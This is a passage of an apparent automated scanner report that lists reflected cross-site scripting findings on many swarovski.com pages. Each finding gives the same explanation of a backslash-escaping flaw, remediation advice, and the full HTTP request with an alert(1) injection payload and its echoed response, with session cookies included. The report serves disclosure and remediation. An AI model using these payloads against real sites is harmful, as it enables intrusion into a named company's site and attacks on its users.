Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes.
Request
GET /Web_US/en/91105/promotion/Unique_gifts.html?fd542\'%3balert(1)//031166322cc=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'fd542\\';alert(1)//031166322cc=1&CatalogCategoryName=91105&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.11. http://www.swarovski.com/Web_US/en/91106/promotion/Festive_jewellery___________.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9244a\'%3balert(1)//61b4ddd52c8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9244a\\';alert(1)//61b4ddd52c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/91106/promotion/Festive_jewellery___________.html?9244a\'%3balert(1)//61b4ddd52c8=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
1.12. http://www.swarovski.com/Web_US/en/91107/promotion/Stunning_decorations___.html [name of an arbitrarily supplied request parameter]
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e390e\'%3balert(1)//8e92150430e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e390e\\';alert(1)//8e92150430e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/91107/promotion/Stunning_decorations___.html?e390e\'%3balert(1)//8e92150430e=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'e390e\\';alert(1)//8e92150430e=1&CatalogCategoryName=91107&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.13. http://www.swarovski.com/Web_US/en/91108/promotion/Limited_Editions.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/91108/promotion/Limited_Editions.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5fc3f\'%3balert(1)//4b58c463744 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5fc3f\\';alert(1)//4b58c463744 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/91108/promotion/Limited_Editions.html?5fc3f\'%3balert(1)//4b58c463744=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: '5fc3f\\';alert(1)//4b58c463744=1&CatalogCategoryName=91108&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.14. http://www.swarovski.com/Web_US/en/91115/promotion/The_Lovlots.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/91115/promotion/The_Lovlots.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload da6e2\'%3balert(1)//2eaa9655d56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as da6e2\\';alert(1)//2eaa9655d56 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/91115/promotion/The_Lovlots.html?da6e2\'%3balert(1)//2eaa9655d56=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'da6e2\\';alert(1)//2eaa9655d56=1&CatalogCategoryName=91115&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.15. http://www.swarovski.com/Web_US/en/91207/promotion/HOME___INTERIOR.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/91207/promotion/HOME___INTERIOR.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7203f\'%3balert(1)//5dae33d9c12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7203f\\';alert(1)//5dae33d9c12 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/91207/promotion/HOME___INTERIOR.html?7203f\'%3balert(1)//5dae33d9c12=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
1.16. http://www.swarovski.com/Web_US/en/91208/promotion/The_New_Collection.html [name of an arbitrarily supplied request parameter]
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca5b6\'%3balert(1)//83c565b0f1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca5b6\\';alert(1)//83c565b0f1b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/91208/promotion/The_New_Collection.html?ca5b6\'%3balert(1)//83c565b0f1b=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... OP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_HLSPage-ViewPage', query: 'ca5b6\\';alert(1)//83c565b0f1b=1&CatalogCategoryName=91208&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call
...[SNIP]...
1.17. http://www.swarovski.com/Web_US/en/account [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/account
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 29bcd\'%3balert(1)//bb57421ee63 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29bcd\\';alert(1)//bb57421ee63 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/account?29bcd\'%3balert(1)//bb57421ee63=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... .enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_MyAccount-ViewPage', query: '29bcd\\';alert(1)//bb57421ee63=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.18. http://www.swarovski.com/Web_US/en/basket [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/basket
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dd60f\'%3balert(1)//ac9e0546ec7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd60f\\';alert(1)//ac9e0546ec7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/basket?dd60f\'%3balert(1)//ac9e0546ec7=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... HOP.enfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Basket-ViewPage', query: 'dd60f\\';alert(1)//ac9e0546ec7=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.19. http://www.swarovski.com/Web_US/en/boutiquefinder [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/boutiquefinder
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 160e4\'%3balert(1)//64e49e86864 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 160e4\\';alert(1)//64e49e86864 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/boutiquefinder?160e4\'%3balert(1)//64e49e86864=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> ...[SNIP]... nfinity/WFS/SCO-Web_US-Site/en_US/-/USD/SMOD_Country-ViewCountrySelect', // optional: linkparams for every countryselection-call linkparams: {RedirectPipeline: 'SPAG_Storefinder-ViewPage', query: '160e4\\';alert(1)//64e49e86864=1&SetIncludeCookies=true'} });
// if wishlist-functionality needed on page config.set('wishlist', { // optional: params for every type of wishlist-call linkparams: {anotherid: 'abcd ...[SNIP]...
1.20. http://www.swarovski.com/Web_US/en/contact_entry [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.swarovski.com
Path: /Web_US/en/contact_entry
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a817\'%3balert(1)//30fbdaee691 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3a817\\';alert(1)//30fbdaee691 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, then the backslash character should be blocked, or escaped by replacing it with two backslashes. Backslashes must be escaped before quotation marks are, otherwise the backslash added for each quotation mark is itself doubled and the quotation mark terminates the string.
Request
GET /Web_US/en/contact_entry?3a817\'%3balert(1)//30fbdaee691=1 HTTP/1.1 Host: www.swarovski.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=igsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ==; swTime=1292186525146; UserInformation=BANNER_ID%3D08002448.100%7CBASKETTOTAL%3D0%7CBASKETITEMS%3D0%7CLOGINSTATUS%3D0%7CBASKETCURRENCYCODE%3DUSD%7CROLEID%3D0%7CSESSIONID%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D; LocaleInformation=JAVACOUNTRYCODE%3DUS%7CCOUNTRYHAWKCODE%3DUS%7CUSERPROMOTIONLANGUAGE%3Den%7CINITIALSESSION%3DigsqwHLldyk-wD_gucIu5hvvEjL2uDSULsxssdYiI9rsJQ%3D%3D%7CUSERPORTALLANGUAGE%3Den%7CUSERSHOPLANGUAGE%3Den;
